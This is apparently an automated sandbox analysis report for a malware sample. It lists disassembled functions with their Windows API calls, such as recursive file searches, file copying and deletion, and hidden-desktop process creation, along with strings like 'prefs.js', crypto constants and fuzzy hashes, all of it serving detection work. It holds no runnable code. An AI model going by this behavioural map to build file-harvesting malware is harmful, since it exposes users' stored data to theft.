String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*$q?A
API String ID: 1125553467-4052298153
Opcode ID: a364c7ef06ed2b08b9cc7aa448d679b8f4053c0569fc226c02cf7786d22a40f8
Instruction ID: 118bc6de907018410b19fab89ebe74f6f374c1ff32bc5bb8bfd4c4c53b142975
Opcode Fuzzy Hash: a364c7ef06ed2b08b9cc7aa448d679b8f4053c0569fc226c02cf7786d22a40f8
Instruction Fuzzy Hash: E9A141B1A042189BDB24DF64DC85FEA7379BB48301F44458EF60D96181EB74AB88CF66

Function 023FC0A7 Relevance: 44.2, APIs: 29, Instructions: 727fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF

Part of subcall function 0240AE97: lstrcpy.KERNEL32(00000000,?), ref: 0240AEE9
Part of subcall function 0240AE97: lstrcat.KERNEL32(00000000), ref: 0240AEF9

Part of subcall function 0240AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0240AF3C
Part of subcall function 0240AF27: lstrcpy.KERNEL32(00000000), ref: 0240AF7B
Part of subcall function 0240AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0240AF89

Part of subcall function 0240AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0240AE7C

FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2F,00000000,?,?,?,00421450,00420B2E), ref: 023FC12C
StrCmpCA.SHLWAPI(?,00421454), ref: 023FC19A
StrCmpCA.SHLWAPI(?,00421458), ref: 023FC1B0
FindNextFileA.KERNEL32(000000FF,?), ref: 023FCB10
FindClose.KERNEL32(000000FF), ref: 023FCB22

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: 7b98e80a942e0a63a7546d3dbe04fcd52efaade0bac1e590d268923d2021d0db
Instruction ID: 9f5a0961b6208f192ba0a79b82517ec98d0ca7786544c01c84ba8dcc89475b55
Opcode Fuzzy Hash: 7b98e80a942e0a63a7546d3dbe04fcd52efaade0bac1e590d268923d2021d0db
Instruction Fuzzy Hash: 095204729002189BCB64FB61DC95EEE733AAF54305F4045BEE64AA60D0EF345B88CF95

Function 00414B60 Relevance: 38.7, APIs: 18, Strings: 4, Instructions: 172fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00414B7C
FindFirstFileA.KERNEL32(?,?), ref: 00414B93
StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
FindClose.KERNEL32(000000FF), ref: 00414DE2

Strings

-SA, xrefs: 00414DE8, 00414DAB, 00414D54, 00414BA8, 00414D57, 00414DAE
%s\%s, xrefs: 00414C4B
%s\%s, xrefs: 00414BF4
%s\*, xrefs: 00414B70

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*$-SA
API String ID: 180737720-309722913
Opcode ID: 043cb273d76c1f4dfb9b648cbe12119fcc5c390ed9e5e5a39beb8ce38b0dc7be
Instruction ID: 6eceda3e2f2aeeb228f448c6629b31eb3c314648a2220d8d34325ba683034fba
Opcode Fuzzy Hash: 043cb273d76c1f4dfb9b648cbe12119fcc5c390ed9e5e5a39beb8ce38b0dc7be
Instruction Fuzzy Hash: F2617771904218ABCB20EBA0ED45FEA737DBF48701F40458EF60996191FB74AB84CF95

Function 02403D67 Relevance: 31.8, APIs: 21, Instructions: 250filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 02403D83
FindFirstFileA.KERNEL32(?,?), ref: 02403D9A
lstrcat.KERNEL32(?,?), ref: 02403DEC
StrCmpCA.SHLWAPI(?,00420F58), ref: 02403DFE
StrCmpCA.SHLWAPI(?,00420F5C), ref: 02403E14
FindNextFileA.KERNEL32(000000FF,?), ref: 0240411E
FindClose.KERNEL32(000000FF), ref: 02404133

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID:
API String ID: 1125553467-0
Opcode ID: 3ab95b3bf23d215e0781e232aecc607664a3e5c33156cac28c621625d69ea7f5
Instruction ID: 81d7ce5bc46228e9ff5381ebeb91600213d06e2304b23b45de0945ece2e6afbd
Opcode Fuzzy Hash: 3ab95b3bf23d215e0781e232aecc607664a3e5c33156cac28c621625d69ea7f5
Instruction Fuzzy Hash: 58A14F71A002189BDB34DFA4DD84FEE7779AF58300F44459AE60D96180EB759BC4CFA2

Function 004147C0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004147D0
HeapAlloc.KERNEL32(00000000), ref: 004147D7
wsprintfA.USER32 ref: 004147F6
FindFirstFileA.KERNEL32(?,?), ref: 0041480D
StrCmpCA.SHLWAPI(?,00420FAC), ref: 0041483B
StrCmpCA.SHLWAPI(?,00420FB0), ref: 00414851
FindNextFileA.KERNEL32(000000FF,?), ref: 004148DB
FindClose.KERNEL32(000000FF), ref: 004148F0
lstrcatA.KERNEL32(?,00A6DEE0,?,00000104), ref: 00414915
lstrcatA.KERNEL32(?,00A71730), ref: 00414928
lstrlenA.KERNEL32(?), ref: 00414935
lstrlenA.KERNEL32(?), ref: 00414946

Strings

%s\*, xrefs: 004147EA
%s\%s, xrefs: 0041486B

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
String ID: %s\%s$%s\*
API String ID: 13328894-2848263008
Opcode ID: 8c6affe258670b47b452d03fd446b08653a83f15644d854d64d273e6cc8e8fce
Instruction ID: 4add3c5e25650dce6a2d7e09fe25a02d5f48076a238705849ce39c3d90be09a7
Opcode Fuzzy Hash: 8c6affe258670b47b452d03fd446b08653a83f15644d854d64d273e6cc8e8fce
Instruction Fuzzy Hash: 145187B1944218ABCB20EB70DC89FEE737DAB58300F40459EB64996190EB74EBC4CF95

Function 02404DC7 Relevance: 27.2, APIs: 18, Instructions: 172fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 02404DE3
FindFirstFileA.KERNEL32(?,?), ref: 02404DFA
StrCmpCA.SHLWAPI(?,00420FC4), ref: 02404E28
StrCmpCA.SHLWAPI(?,00420FC8), ref: 02404E3E
FindNextFileA.KERNEL32(000000FF,?), ref: 02405034
FindClose.KERNEL32(000000FF), ref: 02405049

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID:
API String ID: 180737720-0
Opcode ID: fcb2fc1512f1b2bfff4d459872b36b8889449b0cd5417e01b30465ecde3626f1
Instruction ID: a10ac536bbb70969e195e2db413a0e80a5795799bfd360adfa0bb387ab765f19
Opcode Fuzzy Hash: fcb2fc1512f1b2bfff4d459872b36b8889449b0cd5417e01b30465ecde3626f1
Instruction Fuzzy Hash: 92615871900218ABCB24EBA0ED84FEA737DBF48701F44469EF64D96190EB759788CF91

Function 00409E30 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 157stringsleepprocessCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00409E47

Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,00A69400,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16

wsprintfA.USER32 ref: 00409E7F
OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00409EA3
CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00409ECC
memset.MSVCRT ref: 00409EED
lstrcatA.KERNEL32(00000000,?), ref: 00409F03
lstrcatA.KERNEL32(00000000,?), ref: 00409F17
lstrcatA.KERNEL32(00000000,004212D8), ref: 00409F29
memset.MSVCRT ref: 00409F3D
lstrcpy.KERNEL32(?,00000000), ref: 00409F7C
memset.MSVCRT ref: 00409F9C
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,00000000), ref: 0040A004
Sleep.KERNEL32(00001388), ref: 0040A013
CloseDesktop.USER32(00000000), ref: 0040A060

Strings

D, xrefs: 00409FA4

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: memset$Desktoplstrcat$Create$CloseOpenProcessSleepSystemTimelstrcpywsprintf
String ID: D
API String ID: 1347862506-2746444292
Opcode ID: c979d09899498eba40eceedbf78c6cd84b2d1991ed22f1bef857ee40f5dca85b
Instruction ID: 9351db1e319cd03a78e50f41365f33c4a7b54471eb3ec1f6bde0cae738676000
Opcode Fuzzy Hash: c979d09899498eba40eceedbf78c6cd84b2d1991ed22f1bef857ee40f5dca85b
Instruction Fuzzy Hash: B551B3B1D04318ABDB20DF60DC4AFDA7778AB48704F004599F60DAA2D1EB75AB84CF55

Function 004140F0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00414113
FindFirstFileA.KERNEL32(?,?), ref: 0041412A
StrCmpCA.SHLWAPI(?,00420F94), ref: 00414158
StrCmpCA.SHLWAPI(?,00420F98), ref: 0041416E
FindNextFileA.KERNEL32(000000FF,?), ref: 004142BC
FindClose.KERNEL32(000000FF), ref: 004142D1

Strings

%s\%s, xrefs: 00414107

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: f2ea87638501b071d851062c862ecedcb8ad6f58deb18bcc975d83660161c401
Instruction ID: fabef74ebea8da44b501a85f582971371f90885c40acf49b74ac124388ccf1e1
Opcode Fuzzy Hash: f2ea87638501b071d851062c862ecedcb8ad6f58deb18bcc975d83660161c401
Instruction Fuzzy Hash: 745179B1904118ABCB24EBB0DD45EEA737DBB58304F4045DEB60996090EB74ABC5CF59

Function 02404A27 Relevance: 22.6, APIs: 15, Instructions: 137stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 02404A37
RtlAllocateHeap.NTDLL(00000000), ref: 02404A3E
wsprintfA.USER32 ref: 02404A5D
FindFirstFileA.KERNEL32(?,?), ref: 02404A74
StrCmpCA.SHLWAPI(?,00420FAC), ref: 02404AA2
StrCmpCA.SHLWAPI(?,00420FB0), ref: 02404AB8
FindNextFileA.KERNEL32(000000FF,?), ref: 02404B42
FindClose.KERNEL32(000000FF), ref: 02404B57
lstrcat.KERNEL32(?,006D6F24), ref: 02404B7C
lstrcat.KERNEL32(?,006D6C2C), ref: 02404B8F
lstrlen.KERNEL32(?), ref: 02404B9C
lstrlen.KERNEL32(?), ref: 02404BAD

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
String ID:
API String ID: 671575355-0
Opcode ID: 40b38b74226c8604f7a13fd3e1b0225e2dd82a7444d87f96db159f9eec02a11e
Instruction ID: 20184f7397a1279cdaaac3476183f3b07c96613f7ef82e27dc4c912faba8d31c
Opcode Fuzzy Hash: 40b38b74226c8604f7a13fd3e1b0225e2dd82a7444d87f96db159f9eec02a11e
Instruction Fuzzy Hash: 49514471944218ABCB64EB70DD88FEA737DAF58300F40469AE64D96190EB749BC8CF91

Function 02404357 Relevance: 18.1, APIs: 12, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0240437A
FindFirstFileA.KERNEL32(?,?), ref: 02404391
StrCmpCA.SHLWAPI(?,00420F94), ref: 024043BF
StrCmpCA.SHLWAPI(?,00420F98), ref: 024043D5
FindNextFileA.KERNEL32(000000FF,?), ref: 02404523
FindClose.KERNEL32(000000FF), ref: 02404538

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID:
API String ID: 180737720-0
Opcode ID: ac94dde27fa3a8b2d1992181d9aeba8d94f37141b24e2c59e50ce182db00ab73
Instruction ID: ecb3cc6ab1f43a947e8532b880f24eaa0771d1084a117d949479ce61d4be1e83
Opcode Fuzzy Hash: ac94dde27fa3a8b2d1992181d9aeba8d94f37141b24e2c59e50ce182db00ab73
Instruction Fuzzy Hash: 885167B1904218ABCB24EB70DD84EEA737DBF54300F44469EB74996190EB759BC8CF91

Function 0040EE20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0040EE3E
FindFirstFileA.KERNEL32(?,?), ref: 0040EE55
StrCmpCA.SHLWAPI(?,00421630), ref: 0040EEAB
StrCmpCA.SHLWAPI(?,00421634), ref: 0040EEC1
FindNextFileA.KERNEL32(000000FF,?), ref: 0040F3AE
FindClose.KERNEL32(000000FF), ref: 0040F3C3

Strings

%s\*.*, xrefs: 0040EE32

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\*.*
API String ID: 180737720-1013718255
Opcode ID: c969d09f5c4a69df72357afeb3f331d76aa74d77067d39fcd19690847085812c
Instruction ID: d58f243a0e81953373eaf00141ed8e3e8bc28467f540fc5aad09a1a01b74b281
Opcode Fuzzy Hash: c969d09f5c4a69df72357afeb3f331d76aa74d77067d39fcd19690847085812c
Instruction Fuzzy Hash: 79E16371A121189ADB14FB61DC62EEE7339AF50314F4045EEB10A62092EF386BD9CF59

Function 0242F4FF Relevance: 17.4, Strings: 13, Instructions: 1151COMMON

Download Yara Rule

Strings

nd 3, xrefs: 0242F57E
expa, xrefs: 0242F8C8
2-by, xrefs: 0242F7D5
te knd 3expand 32-by, xrefs: 0242F7B5
expand 3, xrefs: 0242F94C
2-by, xrefs: 0242F55D
te k, xrefs: 0242F9A5
2-byexpa, xrefs: 0242F7BC
nd 32-by, xrefs: 0242F91B
expa, xrefs: 0242FA22
te k, xrefs: 0242F81B
expand 32-by, xrefs: 0242F82F
te k, xrefs: 0242F7AE

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID:
String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
API String ID: 0-1562099544
Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
Instruction ID: a7d40e7232fc064e6c1d3facd0be22f178e4d1e7131fff7302629a3b3421eb8f
Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
Instruction Fuzzy Hash: 74E276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56

Function 0040DF10 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C32), ref: 0040DF5E
StrCmpCA.SHLWAPI(?,004215C0), ref: 0040DFAE
StrCmpCA.SHLWAPI(?,004215C4), ref: 0040DFC4
FindNextFileA.KERNEL32(000000FF,?), ref: 0040E4E0
FindClose.KERNEL32(000000FF), ref: 0040E4F2

Strings

\*.*, xrefs: 0040DF26
4@, xrefs: 0040DF32, 0040E500, 0040DFF3, 0040DF75, 0040DFF6

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
String ID: 4@$\*.*
API String ID: 2325840235-1993203227
Opcode ID: 484dcf77841d37fdcca76b232d2818de80ce689e54c91586e87bbe45cb88a741
Instruction ID: 5b1d21d8256b1a4f75019a03d5e94b0e3f490a8b44af3c5bb40891ece502d815
Opcode Fuzzy Hash: 484dcf77841d37fdcca76b232d2818de80ce689e54c91586e87bbe45cb88a741
Instruction Fuzzy Hash: F6F14D71A151189ACB25EB61DCA5EEE7339AF14314F4005EFB10A62091EF387BD8CF5A

Function 0040F7B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004216B0,00420D97), ref: 0040F81E
StrCmpCA.SHLWAPI(?,004216B4), ref: 0040F86F
StrCmpCA.SHLWAPI(?,004216B8), ref: 0040F885
FindNextFileA.KERNEL32(000000FF,?), ref: 0040FBB1
FindClose.KERNEL32(000000FF), ref: 0040FBC3

Strings

prefs.js, xrefs: 0040F912

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: 072d83594ea58ce967a702448e93c4203c63cf1f112459f6011fb68e56ccc3d7
Instruction ID: 41002e5bbb8aa5eaa1de2a73ae7baa64e6dc855d43d68c47d205a656f8df75cd
Opcode Fuzzy Hash: 072d83594ea58ce967a702448e93c4203c63cf1f112459f6011fb68e56ccc3d7
Instruction Fuzzy Hash: 84B19371A011089BCB24FF61DC96FEE7379AF54304F0045AEA50A57191EF386B98CF9A

Function 00401710 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00425244,?,00401F6C,?,004252EC,?,?,00000000,?,00000000), ref: 00401963
StrCmpCA.SHLWAPI(?,00425394), ref: 004019B3
StrCmpCA.SHLWAPI(?,0042543C), ref: 004019C9
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D80
DeleteFileA.KERNEL32(00000000), ref: 00401E0A
FindNextFileA.KERNEL32(000000FF,?), ref: 00401E60
FindClose.KERNEL32(000000FF), ref: 00401E72

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Strings

\*.*, xrefs: 00401831

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: e3236939d64b81c8e2535d8948c0715255ee738f44246ce4ab20f9b4c07e84b5
Instruction ID: a576ed9f26fd673c6d53a896fc8188a2a0655e62510251b9f9068b5a07b58df1
Opcode Fuzzy Hash: e3236939d64b81c8e2535d8948c0715255ee738f44246ce4ab20f9b4c07e84b5
Instruction Fuzzy Hash: 45125071A111189BCB15FB61DCA6EEE7339AF14314F4045EEB10662091EF386BD8CFA9

Function 023FF087 Relevance: 13.9, APIs: 9, Instructions: 369fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 023FF0A5
FindFirstFileA.KERNEL32(?,?), ref: 023FF0BC
StrCmpCA.SHLWAPI(?,00421630), ref: 023FF112
StrCmpCA.SHLWAPI(?,00421634), ref: 023FF128
FindNextFileA.KERNEL32(000000FF,?), ref: 023FF615
FindClose.KERNEL32(000000FF), ref: 023FF62A

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID:
API String ID: 180737720-0
Opcode ID: 922fd519c71b6af3ccb31eb3f6638551c52bf54377e7cc35e7fa9b6b37ebfbe3
Instruction ID: 53edf8f1a5b7dbe55789e811adb8a9fe007e41adf2260c024a18e8a1df207208
Opcode Fuzzy Hash: 922fd519c71b6af3ccb31eb3f6638551c52bf54377e7cc35e7fa9b6b37ebfbe3
Instruction Fuzzy Hash: 53E1AB729013289ADB59EB61DC94EEE733AAF54301F4045AEA64A620D1EF305FC9CF90

Function 0040DB80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215A8,00420BAF), ref: 0040DBEB
StrCmpCA.SHLWAPI(?,004215AC), ref: 0040DC33
StrCmpCA.SHLWAPI(?,004215B0), ref: 0040DC49
FindNextFileA.KERNEL32(000000FF,?), ref: 0040DECC
FindClose.KERNEL32(000000FF), ref: 0040DEDE

Memory Dump Source

